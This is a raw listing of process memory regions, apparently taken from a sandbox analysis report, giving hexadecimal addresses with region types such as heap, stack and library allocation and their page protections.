C0000AC000
direct allocation
page read and write
236B14B0000
trusted library allocation
page read and write
FD7874B000
stack
page read and write
21E6843F000
heap
page read and write
236B3B41000
trusted library allocation
page read and write
21E68C02000
heap
page read and write
23F4AF00000
heap
page read and write
21E6AC4F000
heap
page read and write
411528E000
stack
page read and write
E339F7F000
stack
page read and write
2C388DE4000
heap
page read and write
1DF1DA99000
unclassified section
page write copy
21E68C02000
heap
page read and write
7FFAAC6B1000
trusted library allocation
page read and write
1F2C7DA0000
heap
page read and write
23F4B902000
heap
page read and write
216661C6000
heap
page read and write
7FFAAC610000
trusted library allocation
page read and write
21E68451000
heap
page read and write
7FFAAC610000
trusted library allocation
page read and write
20A55AE0000
trusted library allocation
page read and write
21E68C0A000
heap
page read and write
C0001BE000
direct allocation
page read and write
2EE285F1000
heap
page read and write
21E6845E000
heap
page read and write
C000132000
direct allocation
page read and write
7FFAAC650000
trusted library allocation
page read and write
4113D7F000
stack
page read and write
2B3BE1E0000
heap
page read and write
2EE2859E000
heap
page read and write
4113CFD000
stack
page read and write
7FFAAC800000
trusted library allocation
page read and write
23F4C0F0000
trusted library section
page readonly
1DF03DBD000
trusted library allocation
page read and write
2B3D7F30000
heap
page read and write
2B3BE1E3000
heap
page read and write
21E68C02000
heap
page read and write
2EE28564000
heap
page read and write
21E68BF1000
heap
page read and write
2B3BE1D0000
heap
page readonly
21E68AB6000
heap
page read and write
7FFAAC8F0000
trusted library allocation
page read and write
7FFB1E3C2000
unkown
page readonly
1DF036C0000
trusted library allocation
page read and write
1DF1BEA0000
heap
page read and write
2166620E000
heap
page read and write
21E68B30000
heap
page read and write
1DF03DC1000
trusted library allocation
page read and write
1DF03AC6000
trusted library allocation
page read and write
1DF01D3C000
heap
page read and write
21E68BF5000
heap
page read and write
C000056000
direct allocation
page read and write
23F4B91A000
heap
page read and write
21E68BF5000
heap
page read and write
216661C6000
heap
page read and write
7FFAAC4AC000
trusted library allocation
page execute and read and write
21E68ADB000
heap
page read and write
BB8FBCD000
stack
page read and write
21E68C00000
heap
page read and write
21E68BBB000
heap
page read and write
21E68C1B000
heap
page read and write
20A540C7000
heap
page read and write
7FFAAC760000
trusted library allocation
page read and write
1DF03830000
heap
page read and write
216661E7000
heap
page read and write
C000051000
direct allocation
page read and write
C00014E000
direct allocation
page read and write
26077FE000
stack
page read and write
21E689AC000
heap
page read and write
AD6BAFE000
stack
page read and write
7FFAAC670000
trusted library allocation
page read and write
C0004C8000
direct allocation
page read and write
21E68C0A000
heap
page read and write
23F505A0000
trusted library allocation
page read and write
23F4B815000
heap
page read and write
2EE2A173000
heap
page read and write
26088CF000
stack
page read and write
21E68C00000
heap
page read and write
706794E000
stack
page read and write
21E6CE43000
heap
page read and write
236AFDE0000
heap
page read and write
21E68AAC000
heap
page read and write
236B1440000
trusted library allocation
page read and write
1DF1D6FA000
unclassified section
page read and write
23F4B05B000
heap
page read and write
C0003EA000
direct allocation
page read and write
21E68240000
heap
page read and write
21E68AEF000
heap
page read and write
21E6845F000
heap
page read and write
23F4AFE0000
heap
page read and write
23F4B013000
heap
page read and write
21E689C7000
heap
page read and write
20A6E690000
heap
page read and write
21E6AC56000
heap
page read and write
1DF036E0000
trusted library allocation
page read and write
21666179000
heap
page read and write
3277C7E000
stack
page read and write
21E68C1B000
heap
page read and write
6FB79CD000
stack
page read and write
7FFAAC5BC000
trusted library allocation
page execute and read and write
C000126000
direct allocation
page read and write
1DF1C180000
direct allocation
page read and write
7FFAAC40B000
trusted library allocation
page read and write
AD6B27E000
unkown
page readonly
C0000D2000
direct allocation
page read and write
21E68BF5000
heap
page read and write
23F4B780000
trusted library section
page read and write
C000430000
direct allocation
page read and write
1DF03A00000
heap
page execute and read and write
AD6AB8B000
stack
page read and write
21E68C00000
heap
page read and write
2E7C78F9000
heap
page read and write
23F504F0000
trusted library allocation
page read and write
2EE28734000
heap
page read and write
236AFB10000
heap
page read and write
2EE2BF10000
direct allocation
page read and write
20A57EC3000
trusted library allocation
page read and write
7FFAAC4A0000
trusted library allocation
page execute and read and write
216661B9000
heap
page read and write
2B3CFA90000
trusted library allocation
page read and write
1DF62D7C000
direct allocation
page read and write
21E68BF1000
heap
page read and write
2B3D8208000
heap
page read and write
1DF1C05B000
heap
page read and write
7DF490030000
trusted library allocation
page execute and read and write
2607D3B000
stack
page read and write
6FB79DE000
stack
page read and write
7FFAAC6D0000
trusted library allocation
page read and write
2B93FAF000
stack
page read and write
2B3BE1A0000
trusted library allocation
page read and write
23F4B073000
heap
page read and write
C00014A000
direct allocation
page read and write
20A6E19A000
heap
page read and write
236B1430000
trusted library section
page read and write
C000000000
direct allocation
page read and write
20A55BF0000
heap
page execute and read and write
2EE2856F000
heap
page read and write
2608ACC000
stack
page read and write
21E68BF8000
heap
page read and write
2EE28586000
heap
page read and write
23F4BA91000
trusted library allocation
page read and write
21E68C0A000
heap
page read and write
4113E7B000
stack
page read and write
23F5064E000
heap
page read and write
2EE285F4000
heap
page read and write
21E68BF1000
heap
page read and write
2B3BE0BE000
heap
page read and write
FD7854D000
stack
page read and write
23F4C0A0000
trusted library section
page readonly
21E6CE40000
heap
page read and write
1A3B3ECA000
heap
page read and write
7FFAAC720000
trusted library allocation
page read and write
23F50810000
trusted library allocation
page read and write
21E68BF8000
heap
page read and write
23F5070E000
heap
page read and write
236B545F000
trusted library allocation
page read and write
7FFAAC6D0000
trusted library allocation
page execute and read and write
21E683F1000
heap
page read and write
21E68A8C000
heap
page read and write
21666110000
heap
page read and write
21E68C02000
heap
page read and write
2A802250000
heap
page read and write
BB8ED79000
stack
page read and write
F8C16FF000
stack
page read and write
2EE2BFB0000
direct allocation
page read and write
23F4B094000
heap
page read and write
21E68B75000
heap
page read and write
236B1760000
heap
page execute and read and write
23F50590000
trusted library allocation
page read and write
21E6898A000
heap
page read and write
1A3B3ECA000
heap
page read and write
2EE2C09F000
direct allocation
page read and write
7FFAAC750000
trusted library allocation
page read and write
2EE2858F000
heap
page read and write
216660D6000
heap
page read and write
21E68B98000
heap
page read and write
236B4625000
trusted library allocation
page read and write
C000226000
direct allocation
page read and write
7FFAAC3F4000
trusted library allocation
page read and write
2B3BE0DF000
heap
page read and write
AD6BC7E000
unkown
page readonly
21E68C1B000
heap
page read and write
7FFAAC400000
trusted library allocation
page read and write
7FFAAC5AA000
trusted library allocation
page read and write
26078FE000
stack
page read and write
1DF01D4F000
heap
page read and write
21E68BF8000
heap
page read and write
21667B44000
heap
page read and write
C000154000
direct allocation
page read and write
AD6CB7E000
unkown
page readonly
21E67EB1000
heap
page read and write
21E68B2B000
heap
page read and write
21E68451000
heap
page read and write
AD6B779000
stack
page read and write
21E68424000
heap
page read and write
1DF01CE9000
heap
page read and write
20A54080000
heap
page read and write
21E68BF5000
heap
page read and write
C000513000
direct allocation
page read and write
21E68C0A000
heap
page read and write
2EE2C010000
direct allocation
page read and write
2EE2858C000
heap
page read and write
1DF13F87000
trusted library allocation
page read and write
2B3C1052000
trusted library allocation
page read and write
2B3CFBD3000
trusted library allocation
page read and write
AD6C17E000
unkown
page readonly
216661BA000
heap
page read and write
21E68AF8000
heap
page read and write
AD6C27B000
stack
page read and write
2B3D8037000
heap
page execute and read and write
1DF1D2C1000
unclassified section
page execute read
21E68B80000
heap
page read and write
21E68A1E000
heap
page read and write
2C388D60000
heap
page read and write
C000501000
direct allocation
page read and write
21666136000
heap
page read and write
21E68C0A000
heap
page read and write
1DF01C7F000
heap
page read and write
1DF01E50000
heap
page read and write
2B3BFA21000
trusted library allocation
page read and write
2EE2C040000
direct allocation
page read and write
AD6BF7E000
stack
page read and write
7FFAAC5D7000
trusted library allocation
page read and write
216661AD000
heap
page read and write
7FFAAC730000
trusted library allocation
page read and write
1A3B5840000
heap
page read and write
C000464000
direct allocation
page read and write
236B1AD9000
trusted library allocation
page read and write
2EE28583000
heap
page read and write
BB8E733000
stack
page read and write
23F50684000
heap
page read and write
236B2ED9000
trusted library allocation
page read and write
7FFAAC3FB000
trusted library allocation
page read and write
2B3C12B0000
trusted library allocation
page read and write
4114DCE000
stack
page read and write
236AFB6E000
heap
page read and write
21E68BF5000
heap
page read and write
7FFAAC680000
trusted library allocation
page read and write
7FFAAC5B0000
trusted library allocation
page execute and read and write
7FFAAC9B2000
trusted library allocation
page read and write
21E68C02000
heap
page read and write
21E68AAE000
heap
page read and write
21E68455000
heap
page read and write
21E68AF2000
heap
page read and write
21E68C02000
heap
page read and write
7FFB167B5000
unkown
page readonly
20A54020000
heap
page read and write
216661AF000
heap
page read and write
21E68A49000
heap
page read and write
BB8EEFE000
stack
page read and write
21E68BF8000
heap
page read and write
7FFAAC630000
trusted library allocation
page read and write
236B15A6000
heap
page read and write
20A66181000
trusted library allocation
page read and write
236B17A1000
trusted library allocation
page read and write
7FFB167A6000
unkown
page readonly
1DF036D0000
heap
page readonly
2608D4E000
stack
page read and write
1DF16269000
trusted library allocation
page read and write
7FFAAC590000
trusted library allocation
page read and write
21E68B30000
heap
page read and write
7FFAAC6B0000
trusted library allocation
page read and write
1DF1D703000
unclassified section
page readonly
21E68443000
heap
page read and write
2E7C7C10000
heap
page read and write
236B45F8000
trusted library allocation
page read and write
21E68972000
heap
page read and write
21E68C0A000
heap
page read and write
21E68C0A000
heap
page read and write
23F4B041000
heap
page read and write
7FFAAC6E0000
trusted library allocation
page read and write
7068E8A000
stack
page read and write
2EE2858C000
heap
page read and write
2E7C7AF0000
heap
page read and write
41142FF000
stack
page read and write
1DF1BDCB000
heap
page read and write
7FFAAC833000
trusted library allocation
page read and write
2B3C10C4000
trusted library allocation
page read and write
21E68C1B000
heap
page read and write
1DF01E76000
heap
page read and write
21E68C0A000
heap
page read and write
23F50702000
heap
page read and write
236B4584000
trusted library allocation
page read and write
AD6BBFE000
stack
page read and write
7FFAAC9B4000
trusted library allocation
page read and write
216661E3000
heap
page read and write
F7FA5F7000
stack
page read and write
41139CE000
stack
page read and write
21E68B61000
heap
page read and write
216660D4000
heap
page read and write
21E68C00000
heap
page read and write
21E68BF5000
heap
page read and write
C00018C000
direct allocation
page read and write
236AFB70000
heap
page read and write
236B4688000
trusted library allocation
page read and write
7FFAAC6A0000
trusted library allocation
page read and write
2C388B50000
heap
page read and write
236AFDE4000
heap
page read and write
21E6AC45000
heap
page read and write
AD6C37E000
unkown
page readonly
C000480000
direct allocation
page read and write
1DF03E22000
trusted library allocation
page read and write
AD6B47E000
unkown
page readonly
236B178C000
trusted library allocation
page read and write
20A56378000
trusted library allocation
page read and write
There are 1550 hidden memdumps, click here to show them.